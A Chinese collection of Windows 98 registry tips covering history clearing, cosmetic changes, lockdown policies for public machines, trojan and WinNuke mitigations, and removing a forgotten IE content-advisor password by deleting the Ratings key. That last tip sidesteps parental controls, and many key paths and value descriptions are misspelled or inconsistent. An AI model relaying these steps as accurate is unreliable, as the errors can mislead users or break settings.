大家都知道,Windows 98具有历史记录功能,它能将用户从事过的各种操作(如查找的内容、运行的程序、浏览的网站)一一记录下来,而后我们再次从是相同操作时就能直接从历史记录中进行检索,从而方便了广大用户的使用。不过任何事情都有两个方面,历史记录尽管可以方便用户的使用,但它也带来了泄密的可能,有些不法用户就会利用这些记录来获取我们已经访问过的Web页面信息。为保证绝对安全,我们就需要采取适当的方法对这些历史记录进行清除。对于我们使用IE上网所留下的历史记录而言,我们该如何进行清除呢?很简单,启动Windows 98的注册表编辑器并展开HKEY_CURRENT_USER\Software\Microsoft\Inertnet Explorer\TypedURLs键值,该键值就是专门用于保存IE历史记录的,它一共有25条记录,保存了用户最近浏览过的25个网站,我们根据需要对有关记录进行选择性删除即可。
注册表妙用三则
启动时的问候信息
想每次开机时机子向你说上一声welcome吗?你可以通过如下方法做到:
打开注册表在 “HKEY——LOCAL——MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon下新建字符串
LegalNoticCaption,、值设为"问候",另"LegalNoticeText"并赋值"Welcome".然后关机重启,翘首以待吧!
公文包变身大法
常用公文包的朋友会否觉得它相貌丑陋.难以入目?那么现在你有福音了。打开注册表编辑器,找到"HKEY--CLASSESROOT\CLSID\{85BBD920_42AO_1069_A2E4_08002B30309D} DefaultIcom"
双击右边窗口中的“默认",将“Syncui.dll"修改为“Syncui.dll,1"重新
启动后你会发现公文包已经摇身一变,成为了一位英俊潇洒的金属战士。
在任务栏里加入个人信息
试过在你心爱的机子屏幕下方加上几条有趣的信息(比方说:Hello Kitty)吗?以下方法可以帮你达成心愿:
打开注册表编辑器在HKEY_CURRENT-_USER\ControlPanel\International下新建
字符串"sTimeFormat",赋值“HH:MM:SS:TT",”
S1159"="Hello!""S2359"="Kitty!",则任务栏前方将显示“HELLO!",后为”Kitty!"
巧用注册表保安全
Internet的普及为我们的生活带来了很多方便。但是你可能并不知道,连接到因特网上的电脑,其系统的安全效能将会受到严格的考验。如果不加防范,电脑上的重要资料、文件等信息将会完全暴露。因此,如何防范恶意攻击或破坏、保证系统安全就成为大家非常关心的话题。笔者在使用电脑的过程中积累了不少安全方面的经验,现就把使用注册表来加强系统安全方面上的一部分操作技巧整理如下,仅供大家参考。
1、让用户名不出现在登录框中
Win9x以上的操作系统可以对以前用户登录的信息具有记忆功能,下次重新启动计算机时,我们会在用户名栏中发现上次用户的登录名,这个信息可能会被一些非法分子利用,而给用户造成威胁,为此我们有必要隐藏上机用户登录的名字 。设置时,请用鼠标依次访问键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon,并在右边的窗口中新建字符串"DontDisplayLastUserName",并把该值设置为"1",设置完后,重新启动计算机就可以隐藏上机用户登录的名字。
2、抵御BackDoor的破坏
目前,网上有许多流行的黑客程序,它们可以对整个计算机系统造成了极大的安全威胁,其中有一个名叫BackDoor的后门程序,专门拣系统的漏洞进行攻击。为防止这种程序对系统造成破坏,我们有必要通过相应的设置来预防BackDoor对系统的破坏。设置时,在编辑器操作窗口中用鼠标依次单击键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,如果在右边窗口中如发现了“Notepad”键值,就将它删除,这样就能达到预防的目的了。
3、不允许使用“控制面板”
控制面板是Windows系统的控制中心,可以对设备属性,文件系统,安全口令等很多系统很关键的东西进行修改,我们当然需要防范这些了。
在隐藏和禁止使用“控制面板”时,我们可以在开始菜单中的运行栏中输入regedit命令,打开注册表编辑器操作界面,然后在该界面中,依次用鼠标单击\\HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System\键值,并在其中新建DWORD值NoDispCPL,把值修改为1(十六进制)就行了。
4、拒绝通过网络访问软盘
为了防止病毒入侵整个网络,导致整个网络处于瘫痪状态,所以我们必须严格管理计算机的输入设备,以断绝病毒的源头,为此就要禁止通过网络访问软盘。设置时,首先单击开始按钮,从弹出的菜单中选择运行命令;随后,程序将弹出一个运行对话框,在该对话框中输入regedit命令,然后在打开的注册表编辑器中依次打开键值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon],在右边的窗口中看看有没有键值AllocateFloppies,如果没有请创建DWORD值,名字取为AllocateFloppies,把它的值修改为0或1,其中0代表可被域内所有管理员访问,1代表仅可被当地登陆者访问。
5、让“文件系统”菜单在系统属性中消失
为了防止非法用户随意篡改系统中的文件,我们有必要把“系统属性”中“文件系统”的菜单隐藏起来。隐藏时,只要在注册表编辑器中用鼠标依次打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System键值,在右边的窗口中新建一个DWORD串值:“NoFileSysPage”,然后把它的值改为“1”即可。
6、锁定桌面
桌面设置包括壁纸、图标以及快捷方式,它们的设置一般都是我们经过精心选择才设定好的。大多数情况下,我们不希望他人随意修改桌面设置或随意删除快捷方式。怎么办?其实修改注册表可以帮我们锁定桌面,这里“锁定”的含义是对他人的修改不做储存,不管别人怎么改,只要重新启动计算机,我们的设置就会原封不动地出现在眼前。设置时,运行regedit进入注册表编辑器,找到如下分支:Hkey-Users\Software\Microsoft\Windows\CurentVersion\Polioies\Explores,并用鼠标双击“No Save Setting”,并将其键值从0改为1就OK了!
7、禁用Regedit命令
注册表对于很多用户来说是很危险的,尤其是初学者,为了安全,最好还是禁止注册表编辑器regedit.exe运行,在公共机房更加重要,不然自己的机器一不小心就被改得一塌糊涂了。
修改注册表时,首先运行regedit进入注册表编辑器操作界面,在该界面中用鼠标依次单击HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\键值,在右边的窗口中如果发现Policies下面没有System主键,则请在它下面新建一个主键,取名System,然后在右边空白处新建一个DWORD串值,名字取为DisableRegistryTools,把它的值修改为1,这样修改以后,使用这个计算机的人都无法再运行regedit.exe来修改注册表了。
8、修复注册表的错误
我们发现实现上面的功能都需要修改注册表,但在实际操作中有时因某些方面的原因,修改注册表时出了一点小错误,那么下次重新启动计算机时某些软硬件工作不正常或者计算机就不能正常工作了,这时我们可将以前备份的注册表文件再导入注册表中,从而恢复注册表以前的内容。在做恢复设置时,首先在运行对话框中输入regedit命令,程序将弹出了一个注册表编辑器窗口,在该窗口中用鼠标单击“注册表”菜单下的“导入注册表文件”,从弹出的文件对话框中找到备份的.reg文件,最后再用鼠标单击该对话框中的“确定”按钮,就可以重新向注册表写入正确信息。当注册表损坏或错误更改了软硬件设置,导致系统启动失败,并且自动修复无效,用“Scanreg.exe /Fix”也无法恢复时,可在纯DOS下运行“scanreg.exe /restory” 进行恢复,有五个数据供选择,先选日期最近的恢复,若仍不行,再依次选择,直到系统正常运行为止。
9、禁止修改“开始”菜单
一般,用户启动某一个程序时往往会在开始菜单下面的程序组中寻找需要的程序,如果我们随意更改开始菜单中的内容,可能会影响其他用户打开程序,所以我们常常需要禁止修改“开始”菜单中的内容。在设置这个内容时,我们可以用鼠标在注册表编辑器窗口中依次单击如下键值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore,接着在右边的窗口中新建一个DWORD串值:“NoChangeStartMenu”,并把它的值设置为“1”。
10、让用户只使用指定的程序
为防止用户非法运行或者修改程序,导致整个计算机系统处于混乱状态,我们可以通过修改注册表来达到让用户只能使用指定的程序的目的,从而保证系统的安全。设置时,可以在注册表编辑器窗口中依次打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer键值,然后在右边的窗口中新建一个DWORD串值,名字取为“RestrictRun”,把它的值设为“1”。然后在RestrictRun的主键下分别添加名为“1”、“2”、“3”等字符串值,然后将“1”,“2”、“3”等字符串的值设置为我们允许用户使用的程序名。例如将“1”、“2”、“3”分别设置为word.EXE、notepad.EXE、write.EXE,则用户只能使用word、记事本、写字板了,这样我们的系统将会做到最大的保障,也可以限制用户运行不必要的软件了。
11、预防WinNuke的破坏
现在有一个叫WinNuke的程序,能对计算机中的Windows系统有破坏作用,为防止该程序破坏Windows操作系统,导致整个计算机系统瘫痪,所以我们有必要预防WinNuke的破坏性。我们可以在注册表中对其进行设置,以保证系统的安全。设置时,在编辑器操作窗口中用鼠标依次单击键值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP,然后在右边的窗口中新建或修改字符串“BSDUrgent”,并把其值设置为0,这样就可以预防WinNuke对系统的破坏了。
12、禁用"任务栏属性"功能
任务栏属性功能,可以方便用户对开始菜单进行修改,可以修改Windows系统的很多属性和运行的程序,这在我们看来是件很危险的事情,所以有必要禁止对它的修改。
修改设置时,首先运行regedit进入注册表编辑器,找到如下分支HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右窗格内新建一个DWORD串值"NoSetTaskBar",然后双击"NoSetTaskBar"键值,在弹出的对话框的"键值"框内输入1,就可以达到禁用"任务栏属性"功能了。
13、禁止修改显示属性
有许多用户为了使自己使用的电脑外观设置变得更漂亮一点,以便能体现出个性化的风格,往往通过修改显示属性达到更改外观的目的。但在实践操作中,我们有时要保证所有计算机的设置都必须相同,以方便同步教学,这时我们就需要禁止修改显示属性了。修改时,可以用鼠标依次打开如下分支:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System,接着在右边的窗口中新建一个DOWRD串值:然后将“新值#1”更名为“NoDispCPL”,并将其值设为“1”就可以了。
14、隐藏“网上邻居”
在局域网中,我们常常可以通过网上邻居来访问别的计算机上的内容,从而实现了资源共享的目的。但有时网上邻居会给我们造成安全上的隐患,例如有的不怀好意的用户可以利用网上邻居来非法删除其他计算机上的重要数据,给其他计算机造成了损失。为了避免这样的损失,我们可以利用注册表来隐藏“网上邻居”。设置时,请用鼠标依次访问键值HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer,接着在右边的窗口中新建DWORD值NoNetHood,并把该值设置为1(十六进制)。
15、禁止屏幕保护使用密码
在公众场合下使用电脑,最忌讳的是用户随意设置系统密码,因为一旦某个用户设置了密码后,其他用户就不能正常使用,严重的能使计算机无法启动。为了避免这些现象的发生,我们有必要限制用户使用带有密码的屏幕保护。设置时,首先运行regedit命令打开注册表编辑器窗口,然后在该窗口中依次单击如下键值:CURRENT_USER\ControlPanel\desktop\ScreenSaveUsePassword,接着修改ScreenSaveUsePassword的值,如果把该值设置为0,表示为屏幕保护不设密码,如果设置为1则使用预设的密码,我们根据自己的需要设置就行了。
对于个人用户在家里使用计算机,这样的安全控制有时是没有必要的,但对于网吧,公共机房的管理者和使用者了解这些安全控制还是很有用的,使你可以轻松简单的控制你的计算机,也大大的减少了你的维护工作。
16、禁用使用注册表编辑器Regedit
注册表对于很多用户来说是很危险的,尤其是初学者,为了安全,最好还是禁止注册表编辑器regedit.exe运行,在公共机房更加重要,不然你的机器一不小心就被改得一塌糊涂了。
打开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System,如果你发现Policies下面没有System主键,则请在它下面新建一个主键,取名System,然后在右边空白处新建一个DWORD串值,名字取为DisableRegistryTools,把它的值修改它的值为1,这样修改以后,使用这个计算机的人都无法再运行regedit.exe来修改注册表了,当然也包括你自己了,如果要恢复的话,请把下面的这段代码存为一个REG.REG文件,然后重新启动:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
17、禁止使用任何程序
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右边的窗口中新建一个DWORD串值:“RestrictRun”,把它的值设为“1”。这样我们就能做到禁止在Windows98中运行任何程序。
18、修改注册表只允许用户使用由你指定的程序
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右边的窗口中新建一个DWORD串值:“RestrictRun”,把它的值设为“1”。然后在RestrictRun的主键下分别添加名为“1”、“2”、“3”等字符串值,然后将“1”,“2”、“3”等字符串的值设置为你允许用户使用的程序名。例如将“1”、“2”、“3”分别设置为word.EXE、notepa XE、empires.EXE,则用户只能使用word、写字板、帝国时代了,这样你的系统将会做到最大的保障,也可以限制用户运行不必要的软件了。
19、禁止修改显示属性
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System在右边的窗口中新建一个DOWRD串值:然后将“新值#1”更名为“NoDispCPL”,并将其值设为“1”就可以的了。
20、禁止使用“控制面版”中的“密码”图标设置功能
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右侧窗口中新建Dword串值,然后将“新值#1”更名为“NoSecCPL”,然后把它的值设置为1就行的了。
21、禁止使用“密码”下的“更改密码”标签
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右侧窗口新建Dword串值,然后将“新值#1”更名为“NoPwdPage”,然后把它的值设置为 1 即可。
22、禁止使用“密码”下的“远程管理”标签
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右侧窗口中新建Dword串值,然后将“新值#1”更名为“NoAdminPage”,然后把它的值设置为 1 即可。
23、禁止使用控制面板中的系统管理程序
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\system\,在右边窗口新建DWORD串值“NoDevMgrPage”并把它的值改为“1”就行。
24、禁止屏幕保护使用密码
打开HKEY_CURRENT_USER\ControlPanel\desktop\ScreenSaveUsePassword修改它的值,值为0或1,0为不设密码,1则使用预设的密码,你根据自己的需要设置就行的了。
25、不允许改变启动菜单
打开HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右边的窗口中新建一个DWORD串值“NoChangeStartMenu”,并设值为“1”即可。
26、禁止在“系统属性”中出现“设备管理器”的菜单
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System,在右边的窗口中新建一个DWORD串值:“NoDevMgrPage”,然后把它的值改为“1”。
27、禁止在“系统属性”中出现“硬件配置文件”的菜单
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System,在右边的窗口中新建一个DWORD串值:“NoConfigPage”,然后把它的值为“1”。
28、更改IE的安全口令
你可以在IE的"Internet选项"对话框的"内容"选项页的"分级审查"框中设置口令,这样,在显示有关的页面时,总会出现"分级审查不允许查看"的提示信息,然后弹出口令对话框,要求您输入监护人口令。如果口令不对,则将停止浏览。但是,如果你把这个口令给遗忘了,你将无法浏览这些页面。在口令遗忘后,即使你重新安装IE4.0也是无法去掉安全口令,这时你只有求助于注册表:
打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies,在Policies子键下选择"Ratings"子键,按Del键将其删除,由于Ratings子键下的Key键值数据就是经过加密后的口令,删除了这一项,IE中的口令也就去掉了。
29、清除各种历史纪录
在Windows98系统中保留着使用者的各种历史纪录,其中包括最近打开的文档、程序、查找过的文件及在网络上的使用情况。在公共机房上机时,为了我们个人安全需要,我们很需要删除这些历史纪录,但一般的删除方法很不干净,这就得求助于注册表了。
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer,删除表中所示的键, 清除Windows\Recent中的内容,刷新文档菜单,这样就能去掉你的记录。下面是这个目录下的表项:
位置 注册表中位置
Documents menu RecentDocs
Run dialog RunMRU
Find Files dialog Doc Find Spec MRU
Find Computer dialog FindComputerMRU
注册表内的安全和用户权限设置
一、限制控制面板
1. 打开注册表 中的主键[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrenVersion\Policies\System](“用户名”指建立了多用户的系统中,相应的用户的名称,如果未建立多用户则为“.Default”),其下如果有下列DWORD值,则该用户的相应的控制面板项被禁止:
“NoDispAppearancePage”=1(禁用“显示器”属性)
“NoDispBackgroundPage”=1(隐藏“显示器”属性中的“背景”页)
“NoDispCPL”=1(隐藏“显示器”属性中的“屏幕保护程序”页)
“NoDispScrSavPage”=1(隐藏“显示器”属性中的“外观”页)
2.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]下如有下列DWORD值,则该用户相应的控制面板项被限制:
“NoNetSetup”=1(禁用“网络”属性)
“NoNetSetupIDPage”=1(隐藏“网络”属性中的“标识”页)
“NoNetSetupSecurityPage”=1(隐藏“网络”属性中的“访问控制”页)
3.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]下如有下列DWORD值,则该用户相应的控制面板项被限制:
“NoSecCPL”=1(禁用“密码”属性)
“NoPwdPage”=1(隐藏“密码”属性中的“更改密码”页)
“NoAdminPage”=1(隐藏“远程管理”页)
“NoProfilePage”=1(隐藏“系统”属性中的“用户配置文件”页)
“NoDevMgrPage”=1(隐藏“系统”属性中的“设备管理”页)
“NoConfigPage”=1(隐藏“系统”属性中的“硬件配置文件”页)
“NoFileSysPage”=1(隐藏“系统”属性“性能”页中的“文件系统”按钮)
“NoVirtMemPage”=1(隐藏“系统”属性“性能”页中的“虚拟内存”按钮)
二、限制开始菜单
如果在[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]下有DWORD值“NoRun”=1时,则该用户的开始菜单中的“运行”命令被禁止;
如果有DWORD值“NoSetFolders”=1时,则该用户的开始菜单中的“设置\文件夹选项”命令被禁止;
如果有DWORD“NoSetTaskbar”=1时,则该用户的开始菜单中的“设置\任务栏和开始菜单”命令被禁止;
如果有DWORD值“NoFind”=1时,则该用户的开始菜单中的“查找”命令被隐藏;
如果有DWORD值“NoStartMenuSubFolders”=1,则该用户“开始”菜单中的子文件夹被隐藏;
如果有DWORD值“NoClose”=1时,则该用户的开始菜单中的“关闭系统”命令被禁止;
如果有DWORD值NoLogOff=1时,则该用户的开始菜单中的“注销”命令被隐藏
三、网络和用户设置
1.如果在[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]下有DWORD值“NoDrives”=1时,则该用户“我的电脑”中的所有驱动器被隐藏;
如果有DWORD值“NoNetHooD”=1时,则该用户的“网上邻居”被隐藏;
如果有DWORD值“NoEntioeNetwork”=1时,则该用户的“网上邻居”中 “整个网络” 被隐藏;
如果有字符串值“NoWorkgroupContents”=1时,则该用户的“网上邻居”中工作组目录被隐藏;
如果有DWORD值“NoDesktop”=1时,则该用户的桌面上所有的程序组被隐藏(即没有桌面);
如果有DWORD值“NoSaveSettings”=1时,则该用户退出系统时所作的设置不被保存。
2.拨号网络和共享设置:在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Policies\Network]下建立以下DWORD值,则相应的限制有效:
“NoDialIn”=1(禁止拨入)
“NoFileSharing”=1(禁用文件共享)
3.只运行允许的Windows程序的列表:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]下如有主键“RestrictRun”,则其下的字符串值表示允许该用户只能运行的Windows程序的列表。
四、口令设置
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]下建立以下DWORD值,则相应的设置有效:
“HideSharePwds”=1(使用星号(*)隐藏共享口令)
“DisablePwdCaching”=1(禁用口令缓存;注意!请慎用此项设置,此时控制面板中的“密码”属性中无法更改密码,登录时该用户使用任何一个密码或不用密码就可以登录。)
“AlphanumPwds”=1(使Windows口令必须为数字和字母)
“MinPwdLen”=n(设置Windows口令的最小长度,n大于等于0小于等于8)
五、禁用“MSDOS”方式、禁用单一模式的MSDOS应用程序
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]下如果有主键“WinOldApp”其下有DWORD值“Disabled”=1,则该用户的“MSDOS”方式被禁止;“WinOldApp”下如有DWORD值“NoRealMode”=1,则该用户单一模式的MSDOS应用程序被禁用。
六、自启动的程序
[HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\Run]其下的字符串值表示通过注册表自启动的程序;
[HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\RunOnce]其下的字符串值表示只自启动一次的程序;
[HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\RunServices]其下的字符串值表示通过注册表自启动的服务程序;
[HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\RunServicesOnce]其下的字符串值表示只启动一次的服务程序。
由此,我们可以看出上面所有的DWORD值,如果其值为“1”时表示该值有效,其值为“0”时表示该值无效;我们可以通过改变DWORD值或删除该DWORD,来轻松地使相应的限制有效或无效。
注册表修改指南
1 提高子菜单速度
位 置:HKEY_CURRENT_USER\Control Panel\Desktop
键值名:Menushowdelay
双击键值Menushowdelay后,弹出该键值的编辑窗口,在文本输入框内输入“0”后,再单击“确定”按钮即可。注意在系统默认的菜单弹出效果下,不易感觉到菜单弹出速度的提高;这时,请在桌面上单击“属性”命令,弹出“显示 属性”窗口,然后在“效果”标签下将“动画显示菜单和工具提示”下的“淡入淡出效果”改为“滚动效果”。
2 自动刷新窗口内容
位 置:HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update
键值名:UpdateMode
取 值:0、1
若“UpdateMode”键值为0,则设置为自动刷新,
若“UpdateMode”键值为1,则设置为手工刷新;
这等于在资源管理器窗口内按“F5”键或者在“查看”菜单中选择“刷新”命令。
3 去掉升级
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名:NoCommonGroups
取 值:1为隐藏、0为显示
4 去掉“文档”
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名:NoRecentDocsMenu
取 值:1为隐藏、0为显示
5 自动清除“文档”
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名:ClearRecentDocsOnExit
取 值:1为自动清除、0为不自动清除
6 锁定“文档”
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名:NoRecentDocsHistory
取 值:1为锁定、0为不锁定
7 缩短“新建”选项
当你用鼠标右键点击资源管理器空白处,并选取新建菜单时,会弹出建立多种程序文件的菜单,但是里面有一些你可能并不常用,比如现在我要去除掉菜单中的“Wave Sound”项目,来缩短菜单。 打开注册表,请选择查看下的搜索项,然后输入“shellnew”,并选择“全字匹配”选项;在HKEY_LOCAL_MACHINE与HKEY_LOCAL_ROOT下进行查找,找到后将该其下面的shellnew子键删除掉即可。
8 清除配色方案
位 置:HKEY_CURRENT_USER\Control Panel\Appearance\Schemes
首先请找到该子键,在窗口的右边会出现系统自带的各种配色方案,将你认为无用的配色方案删除掉,一般只保留“Windows默认”一项。 然后再打开“控制面板”窗口中的“显示”,然后在“显示 属性”窗口中单击“外观”标签,在“窗口配色方案”下拉列表中进行查看。
9 修改桌面图标
例如,我们修改Windows桌面上“回收站”的名字及图标,可执行如下操作步骤。
位 置:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
先打开注册表编辑器;然后根据上面提供的位置找到该主键,双击窗口右边的“回收站”,弹出字符串编辑器, 然后在文本输入框内,将“回收站”改为“垃圾筒”, 重新启动机器后,桌面上的回收站就变成了垃圾筒,但图标依旧!单击{645FF040-5081-101B-9F08-00AA002F954E}前面的“+”,则展开这个主键,在它下面还有一个子键DefaultIcon。然后单击此子键,在右窗格中的“数据”栏下将出现三个图标文件名,分别为“$#@60;未命名$ 2;”、“Full”(满)、“Empty”(空)的回收站图标,这三个图标包含在动态链接库Shell32.dll文件里面,图标资源所在的序号分别是31、31、32, 其数据格式是“C:\Windows\System\Shell32.dll,31”等(调用动态链接库中的图标资源,采用这种格式就可以啦!)。如果您想把它改成自己的图标,则只要将此数据改为自己图标或者动态链接库即可,例如使用图标文件为“C:\Windows\help.ico”,这样再重新启动机器就可以看到垃圾筒的图标被改变了。利用同样的方法可以修改桌面上其它的图标和文字。
10 删除“系统”
当你想删除桌面上的“回收站”、“Internet Explorer”等图标时,会发现它们不能用一般的方法删除。这时还可以通过修改注册表来办到。
位 置:HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace在该分支下面有多个子键,这些子键将对应桌面上的“系统”图标,在窗口右边你就可以看到。删除不需要的图标,即对应的键值;重新启动后,会看到桌面上的一些图标不见啦!
11 关闭系统版本号
位 置:HKEY_CURRENT_USER\Control Panel\desktop
键值名:PaintDesktopVersion
取 值:0为隐藏、1为显示
说 明:它能把你的Windows的版本号在桌面的右下角显示出来,如果你使用的是测试版, 那么就可以将桌面右下角的文字去掉。
12 隐藏指定驱动器
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名:NoDrives
取 值:需要说明一下,在这里使用的是2的N次方来代表一个驱动器名称,而非寻常的A、B、C、D……,下面就给出各驱动器名与2的N次方的对应关系,以方便读者:A: 1, B: 2,C: 4, D: 8, E: 16, F: 32, G: 64,H: 128, I: 256,J: 512,K: 1024, L: 2048, M: 4096, N: 8192,O: 16384, P: 32768, Q:65536,R: 131072,S: 262144,T: 524288, U: 1048576, V: 2097152, W:4194304,X: 8388608, Y: 16777216, Z: 33554432按照上面的取值规则,如果你要隐藏A、B、C三个驱动器,输入7即可,因为7=1+2+4,如果你要隐藏所有驱动器,输入67108863。
13 修改“回收站”
位 置:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
键值名:Attributes
取 值:40 01 00 20、70 01 00 20
说 明:缺省情况下是40 01 00 20,把它改为70 01 00 20后,就可以把桌面上的“回收站”象资源管理器内的文件一样,能任意地更名或者删除了。
14 修改桌面
位 置:HKEY_CURRENT_USER\ControlPanel\desktop
说 明:打开注册表编辑器,然后打开该分支。在此分支右窗格内可以看到一些项目,现介绍几个如下:HungAppTimeout:这是指一个应用程序出错时试图等待响应的时间,值为毫秒,缺省值为5000毫秒(即5秒),可以减少为3000毫秒,以加快系统的响应能力。MenuShowDelay:这是指“开始”菜单中当鼠标指向一个具有下级 菜单的菜单项时等待出现下级菜单的延迟时间,单位也是毫秒,可以设成100,即等待0.1秒就会出现(前面已经提到过)。ScreenSaveActive:这是现在屏幕保护功能是否可用,值为0或1,0即为不用屏幕保护功能,1为可用,但必须你已经使用了屏幕保护功能。ScreenSaveTimeOut:这是指屏幕保护的延时,值类型为一个数值。单位是秒,最小值是60秒,但必须你已经使用了屏幕保护功能;如果你将数值改为1,那么每停顿1秒钟,便会启动屏幕保护。WaitToKillAppTimeout:这是指当按下 Crtl+Alt+Del后以后,出现“关闭程序”对话框,出现提示“结束任务”、“等待”时选择“等待”的等待时间,单位是毫秒,默认值是10000。可以减少等待时间。
15 定制按钮颜色
尽管Windows在外观中可以定义多种窗口显示方案,但要定义某一个部位的颜色,如将黑色的按钮字体改变为其它的颜色, 它就无能为力啦!通过修改注册表能很容易实现。 在注册表内找到HKEY_CURRENT_USER\Control Panel\Colors的子键,然后将窗口右边的“Bottontext”键值由原来的“0 0 0”改为“255 0 0”(代表红色)。
16 汉字后加空格
位 置:HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion
键值名:插空格
取 值:0不插入空格、1插入空格
17 活用Enter键
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion键值名:
取 值:0保留原功能,输入法不处理、1等同于Esc键,用于清除当前外码输入状态说 明:当取值为1时,如果有候选窗口,会自动隐藏输入窗口,清除所有外码,但不隐藏外码输入窗口。当无候选窗口,清除外码,并隐藏外码输入窗口。
18 活用Space键
位 置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion键值名:
取 值:0指明这是作为结束外码输入的标志键,这种设置适合于形码、1指明这是作为候选选择键,这种设置适合于音码。
19 系统时间格式
位 置:HKEY_CURRENT_USER\ControlPanel\International键值名:sTimeFormat
取 值:H:mm:ss、HHmm不等
说 明:在通常情况下,Windows在任务栏中使用“23:12”的时间格式来显示时间, 但是您可以通过修改注册表编辑器来更改此时间格式。
20 更改登录背景
位 置:HKEY_USERS\.DEFAULT\Control Panel\Desktop
键值名:Wallpaper
取 值:目标背景图文件路径
21 修改注册码
位 置:HKEY_LOCALMACHINE\Software\Microsoft\Windows\CurrentVersion
键值名:ProductId
取 值:任意字符
22 软件显示乱码
解决的方法是在注册表内找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\fontassoc\Associated CharSet位置,将窗口右边内的“SYMBOL(02)” 键值(这是系统的机内码)改为“NO”即可。
23 删除软件的残骸
每一个Windows操作系统的的使用者可能都有这样的经历,由于种种原因直接在硬盘中删除了某个文件夹,或者是在“添加/删除程序”里面对一些软件进行反安装。但是有些程序却还有注册信息留在注册表内,当你再次从“添加/删除程序”中卸载该程序时,老是提示“试图删除XXXXXX时出错,放弃卸载”,从而导致了卸载程序错误。当机器中安装大量的软件后随着时间的后移,就在系统的注册表中就形成了垃圾,影响了机器的运行速度。下面介绍彻底清除这些垃圾的方法。用注册表编辑器来清除注册表中关于卸载应用程序的相关键值数据HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall位置,一般的软件在注册表内的反安装子键里有“DisplayName”、“UninstallString”这两个键值,第一个显示的是软件的名称、第二个 显示的是反安装的一些信息。双击第二个键值后,便会明白反安装是怎么回事,反安装实际上是你所安装的软件自带有一个反安装程序,在安装该软件时,它会自己记录一些安装信息存放Install.log文件中,卸载时用这个反安装程序再带上.log文件的参数即可。另外,有些软件反安装时使用的是系统提供的反安装程序。再如,许多应用软件在卸载之后仍会在注册表文件内留下一些无用信息。比较集中的地方在HKEY_LOCAL_MACHINE\Software、HKEY_CURRENT_USER\Software和HKEY_USERS\.Default 